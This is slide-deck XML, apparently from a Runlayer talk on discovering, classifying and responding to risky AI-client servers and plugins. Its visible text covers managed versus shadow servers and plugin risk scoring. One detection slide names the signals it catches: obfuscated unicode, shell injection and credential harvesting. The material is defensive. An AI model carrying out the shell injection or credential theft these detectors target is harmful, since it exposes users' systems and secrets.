            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>Agenda</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="63" name="Google Shape;63;p14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="937633" y="1698749"/>
            <a:ext cx="3723234" cy="246309"/>
            <a:chOff x="4141415" y="892352"/>
            <a:chExt cx="3723234" cy="246309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="Google Shape;64;p14"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4561349" y="892352"/>
              <a:ext cx="3303300" cy="2463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1200"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Geist Medium"/>
                  <a:ea typeface="Geist Medium"/>
                  <a:cs typeface="Geist Medium"/>
                  <a:sym typeface="Geist Medium"/>
                </a:rPr>
                <a:t>The Problem</a:t>
              </a:r>
              <a:endParaRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Geist"/>
                <a:ea typeface="Geist"/>
                <a:cs typeface="Geist"/>
                <a:sym typeface="Geist"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="65" name="Google Shape;65;p14" title="Runlayer (dark bg).png"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="0" l="0" r="76230" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4141415" y="892361"/>
              <a:ext cx="261918" cy="246300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="66" name="Google Shape;66;p14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="937633" y="2048820"/>
            <a:ext cx="3430437" cy="246319"/>
            <a:chOff x="4148956" y="1252633"/>
            <a:chExt cx="3430437" cy="246319"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="Google Shape;67;p14"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4568893" y="1252633"/>
              <a:ext cx="3010500" cy="2463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1200"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Geist Medium"/>
                  <a:ea typeface="Geist Medium"/>
                  <a:cs typeface="Geist Medium"/>
                  <a:sym typeface="Geist Medium"/>
                </a:rPr>
                <a:t>The Attacks</a:t>
              </a:r>
              <a:endParaRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Geist"/>
                <a:ea typeface="Geist"/>
                <a:cs typeface="Geist"/>
                <a:sym typeface="Geist"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="68" name="Google Shape;68;p14" title="Runlayer (dark bg).png"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="0" l="0" r="76230" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4148956" y="1252653"/>
              <a:ext cx="261918" cy="246300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="69" name="Google Shape;69;p14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="937633" y="2398900"/>
            <a:ext cx="3430437" cy="246319"/>
            <a:chOff x="4148956" y="1608665"/>
            <a:chExt cx="3430437" cy="246319"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name="Google Shape;70;p14"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4568893" y="1608665"/>
              <a:ext cx="3010500" cy="2463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1200"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Geist Medium"/>
                  <a:ea typeface="Geist Medium"/>
                  <a:cs typeface="Geist Medium"/>
                  <a:sym typeface="Geist Medium"/>
                </a:rPr>
                <a:t>Discovery and Classification</a:t>
              </a:r>
              <a:endParaRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Geist"/>
                <a:ea typeface="Geist"/>
                <a:cs typeface="Geist"/>
                <a:sym typeface="Geist"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="71" name="Google Shape;71;p14" title="Runlayer (dark bg).png"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="0" l="0" r="76230" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4148956" y="1608685"/>
              <a:ext cx="261918" cy="246300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="72" name="Google Shape;72;p14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="937633" y="2748981"/>
            <a:ext cx="3430437" cy="246319"/>
            <a:chOff x="4141431" y="1950665"/>
            <a:chExt cx="3430437" cy="246319"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73" name="Google Shape;73;p14"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4561368" y="1950665"/>
              <a:ext cx="3010500" cy="2463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1200"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Geist Medium"/>
                  <a:ea typeface="Geist Medium"/>
                  <a:cs typeface="Geist Medium"/>
                  <a:sym typeface="Geist Medium"/>
                </a:rPr>
                <a:t>Respond</a:t>
              </a:r>
              <a:endParaRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Geist"/>
                <a:ea typeface="Geist"/>
                <a:cs typeface="Geist"/>
                <a:sym typeface="Geist"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="74" name="Google Shape;74;p14" title="Runlayer (dark bg).png"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="0" l="0" r="76230" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4141431" y="1950685"/>
              <a:ext cx="261918" cy="246300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75" name="Google Shape;75;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4660871" y="1600315"/>
            <a:ext cx="4141099" cy="2641735"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="76" name="Google Shape;76;p14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="937633" y="3099056"/>
            <a:ext cx="3430437" cy="246319"/>
            <a:chOff x="4141431" y="1950665"/>
            <a:chExt cx="3430437" cy="246319"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="Google Shape;77;p14"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4561368" y="1950665"/>
              <a:ext cx="3010500" cy="2463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1200"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Geist Medium"/>
                  <a:ea typeface="Geist Medium"/>
                  <a:cs typeface="Geist Medium"/>
                  <a:sym typeface="Geist Medium"/>
                </a:rPr>
                <a:t>The End</a:t>
              </a:r>
              <a:endParaRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Geist"/>
                <a:ea typeface="Geist"/>
                <a:cs typeface="Geist"/>
                <a:sym typeface="Geist"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="78" name="Google Shape;78;p14" title="Runlayer (dark bg).png"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="0" l="0" r="76230" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4141431" y="1950685"/>
              <a:ext cx="261918" cy="246300"/>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7" name="Shape 207"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="Google Shape;208;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550350" y="1433650"/>
            <a:ext cx="5884200" cy="154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chemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Managed vs Shadow</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Managed = provisioned through approved infrastructure, monitored</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shadow = configured directly in AI client, outside organizational control</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Skills/Plugins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Risk Scoring</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LLMs are too slow, nondeterministic, and hallucinate</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pattern-based detection catches known-bad signals (obfuscated unicode, shell injection, credential harvesting)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Behavior-based analysis catches what pattern matching misses - attackers obfuscate, detection adapts</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>An evolving arms race: as obfuscation techniques advance, so must the detection</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="Google Shape;209;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="359875"/>
            <a:ext cx="7873200" cy="936000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>Discovery &amp; Classification</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="Google Shape;210;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="827875"/>
            <a:ext cx="6412200" cy="2772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en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="474441"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>Classification &amp; Risk Scoring</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="474441"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="211" name="Google Shape;211;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6434546" y="1728896"/>
            <a:ext cx="2257950" cy="28208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5" name="Shape 215"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Google Shape;216;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="359875"/>
            <a:ext cx="3759000" cy="468000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>Respond</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="Google Shape;217;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163625" y="1507300"/>
            <a:ext cx="6412200" cy="3693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en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="474441"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>How To Use This To Do Something</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="474441"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="218" name="Google Shape;218;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1939025" y="2130925"/>
            <a:ext cx="5265956" cy="29621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2" name="Shape 222"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="Google Shape;223;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="359875"/>
            <a:ext cx="7873200" cy="468000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>Respond</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="Google Shape;224;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
